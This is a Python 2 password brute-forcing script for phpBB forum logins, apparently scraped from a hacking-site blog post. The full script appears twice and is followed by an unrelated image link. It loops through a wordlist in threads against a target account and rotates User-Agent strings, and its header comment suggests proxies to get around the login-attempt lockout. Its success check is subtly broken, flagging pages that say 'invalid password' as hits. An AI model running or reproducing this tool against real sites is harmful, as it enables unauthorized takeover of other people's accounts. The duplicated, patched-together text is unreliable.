#!usr/bin/python
#phpBB Brute Forcer POC
#POC because of the 5 login attempts for 30 min, proxies?
#
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./phpBBbrute.py <server> <user> <wordlist>"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com phpBBBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] User:",sys.argv[2]
print "[+] Words Loaded:",len(words),"\n"
headers = ["Mozilla/5.0 (compatible)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)", "Windows NT 6.0 (MSIE 7.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Windows NT 4.0 (MSIE 5.0)"]
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[2],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent", random.sample(headers, 1)[0])]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen(sys.argv[1])
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["username"] = sys.argv[2]
form["password"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("invalid password", line.lower()) != None:
print "\tSuccessful Login:", value
print line
success = value
sys.exit(1)
if re.search("The maximum number of 5 login attempts has been exceeded.",line):
print "Attempts exceeded"
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login:",sys.argv[1]
print "[+] User:",sys.argv[2]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
#phpBB Brute Forcer POC
#POC because of the 5 login attempts for 30 min, proxies?
#
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./phpBBbrute.py <server> <user> <wordlist>"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com phpBBBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] User:",sys.argv[2]
print "[+] Words Loaded:",len(words),"\n"
headers = ["Mozilla/5.0 (compatible)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)", "Windows NT 6.0 (MSIE 7.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Windows NT 4.0 (MSIE 5.0)"]
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[2],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent", random.sample(headers, 1)[0])]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen(sys.argv[1])
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["username"] = sys.argv[2]
form["password"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("invalid password", line.lower()) != None:
print "\tSuccessful Login:", value
print line
success = value
sys.exit(1)
if re.search("The maximum number of 5 login attempts has been exceeded.",line):
print "Attempts exceeded"
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login:",sys.argv[1]
print "[+] User:",sys.argv[2]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
![LS++ [ LS colors installation ]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG3ppun4aTMWhyphenhyphenPElcgzsZbX_dF-RdEaaof6TlfmaQVIq-QxKEqhhSmhqld3UbxgQEDLRbteguYe816H_5tjVmD57YrPN0H0Cd6qgE43vs6E5FWPfSiXAyrGN95lfCEjc_2dtikmA1OZCN/s72-c/687474703a2f2f646576656c2e6a6170682e73652f4170702d6c732532622532622f6c732532622532625f787465726d2e706e67.png "LS++ [ LS colors installation ]")
0 comments